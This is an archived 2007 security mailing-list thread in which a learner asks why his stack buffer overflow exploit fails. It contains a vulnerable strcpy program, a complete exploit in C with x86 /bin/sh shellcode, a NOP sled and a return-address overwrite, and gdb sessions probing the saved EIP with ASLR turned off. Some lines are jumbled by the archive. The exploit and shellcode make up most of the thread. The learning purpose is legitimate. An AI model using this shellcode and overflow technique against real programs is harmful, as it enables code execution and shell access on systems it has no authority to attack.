RE: stack overflow help ..
- From: gaurav saha <gauravsaha007@xxxxxxxxx>
- Date: Sun, 28 Jan 2007 03:43:44 -0800 (PST)
yes I read ..
if i write more 4 bytes ..it over writes teh *saved*
eip .. right ??
========= vul1.c ========
[root@winmitm ~]# more a1.c
f(char *str) {
char a[1024];
strcpy(a,str);
}
main(int argc,char *argv[1]) {
if(argc>1) f(argv[1]);
}
====== end of code ===
my exploit code which i wrote for this was ..
===== exploit1.c ======
#include <stdio.h>
#include <string.h>
#define lv_size 1024
#define offset 30+lv_size+8*4
long get_sp()
{
__asm__("movl %esp, %eax");
}
int main(int argc, char **argv)
{
char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char buffer[lv_size+4*8];
unsigned long *ptr2 = NULL;
char *ptr = NULL;
int i;
printf("1..\n");
// Filling with null
for(i=0;i<lv_size+4*8;i++)
buffer[i]=0x00;
ptr=buffer;
printf("2..\n");
// Filling with NOPs
for(i=0;i<lv_size-strlen(execshell);i++)
*(ptr++)=0x90;
printf("3..\n");
// Filling with shellcode
for(i=0;i<strlen(execshell);i++)
*(ptr++)=execshell[i];
printf("4..\n");
// ptr2 pointing to ptr
ptr2=(long *)ptr;
printf("5..\n");
// Filling with address
for(i=1;i<2;i++)
*(ptr2++)=get_sp()+offset;
execl("/root/vul1", "vul1", buffer, NULL);
}
======== end of my exploit code =======
[root@winmitm ~]# cc expl1.c -o exploit
[root@winmitm ~]# ./exploit
1..
2..
3..
4..
5..
get_sp=bfffe568 and len=4
get_sp+offset=bfffe9a6 and len=4
6..
buffer:<�^^
3VV45V4N
�3��/bin/sh�>
[root@winmitm ~]#
this is what i get ... can u please guide me on what i
am doing wrong ??
thanks
----gaurav
--- "Krpata, Tyler" <tkrpata@xxxxxxx> wrote:
Do an "info frame" in gdb. Remember that you are________________________________________________________________________
trying, actually, to
overwrite the *saved* EIP value.
-----Original Message-----[mailto:listbounce@xxxxxxxxxxxxxxxxx]
From: listbounce@xxxxxxxxxxxxxxxxx
On Behalf Of gaurav sahavalues.
Sent: Thursday, January 25, 2007 6:27 PM
To: security-basics@xxxxxxxxxxxxxxxxx
Subject: stack overflow help ..
Hi,
i am new to this stack overflow issue.
i am using fc3 (kernel 2.6.12-1.1381)
i have modified this few sysctl keys to these
`perl
kernel.overflowgid = 0
kernel.overflowuid = 0
fs.overflowgid = 0
fs.overflowuid = 0
kernel.randomize_va_space = 0
i am still unable to overwrite EIP
========= vuln1.c ===========
int main(int argc, char **argv)
{
char buf[1024];
strcpy(buf, argv[1]);
return 0;
}
====== end of vuln1.c =======
$gcc -ggdb vuln1.c -o v1
$gdb ./v1
.
.
.
.
(gdb) run `perl -e 'print "A"x1024'`
Starting program:
/home/gaurav/test/challenges/challenges/buf/v1
-e 'print "A"x1024'`target
Reading symbols from shared object read from
memory...(no debugging symbols found)...done.symbols
Loaded system supplied DSO at 0xb5c000
(no debugging symbols found)...(no debugging
found)...target
Program exited with code 0120.
(gdb) run `perl -e 'print "A"x1028'`
warning: cannot close "shared object read from
memory": File in wrong format`perl
Starting program:
/home/gaurav/test/challenges/challenges/buf/v1
-e 'print "A"x1028'`target
Reading symbols from shared object read from
memory...(no debugging symbols found)...done.symbols
Loaded system supplied DSO at 0x247000
(no debugging symbols found)...(no debugging
found)...target
Program exited with code 0100.
(gdb) run `perl -e 'print "A"x1036'`
warning: cannot close "shared object read from
memory": File in wrong format`perl
Starting program:
/home/gaurav/test/challenges/challenges/buf/v1
-e 'print "A"x1036'`target
Reading symbols from shared object read from
memory...(no debugging symbols found)...done.symbols
Loaded system supplied DSO at 0x807000
(no debugging symbols found)...(no debugging
found)...fault.
Program received signal SIGSEGV, Segmentation
0x00ac8e0d in __libc_start_main () fromfault.
/lib/tls/libc.so.6
(gdb) info reg
.
.
ebx 0xbdaff4 12431348
esp 0xbffff350 0xbffff350
ebp 0x41414141 0x41414141
esi 0xbffff3d4 -1073744940
edi 0xbffff360 -1073745056
eip 0xac8e0d 0xac8e0d
eflags 0x210286 2163334
.
.
(gdb) run `perl -e 'print "A"x1040'`
Program received signal SIGSEGV, Segmentation
0x080483a2 in main ()fault.
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1044'`
Program received signal SIGSEGV, Segmentation
0x080483a2 in main ()fault.
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1048'`
Program received signal SIGSEGV, Segmentation
0x080483a2 in main ()fault.
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1052'`
Program received signal SIGSEGV, Segmentation
0x080483a2 in main ()fault.
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1056'`
Program received signal SIGSEGV, Segmentation
0x080483a2 in main ()
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
and this keeps continuing ... no matter how many i
increase ...
and i can't figure out what problem it is ...
thanks and adieu
----gaurav
__
__________hotels
Now that's room service! Choose from over 150,000
in 45,000 destinations on Yahoo! Travel to findyour fit.
http://farechase.yahoo.com/promo-generic-14795097
____________________________________________________________________________________
Looking for earth-friendly autos?
Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center.
http://autos.yahoo.com/green_center/
- References:
- RE: stack overflow help ..
- From: Krpata, Tyler
- RE: stack overflow help ..
- Prev by Date: RE: Highlighting weak password dangers
- Next by Date: Re: hey the stack overflow solve !!!!!!! !!
- Previous by thread: RE: stack overflow help ..
- Next by thread: doubt about TCP/IP linux implementation
- Index(es):
Relevant Pages
|
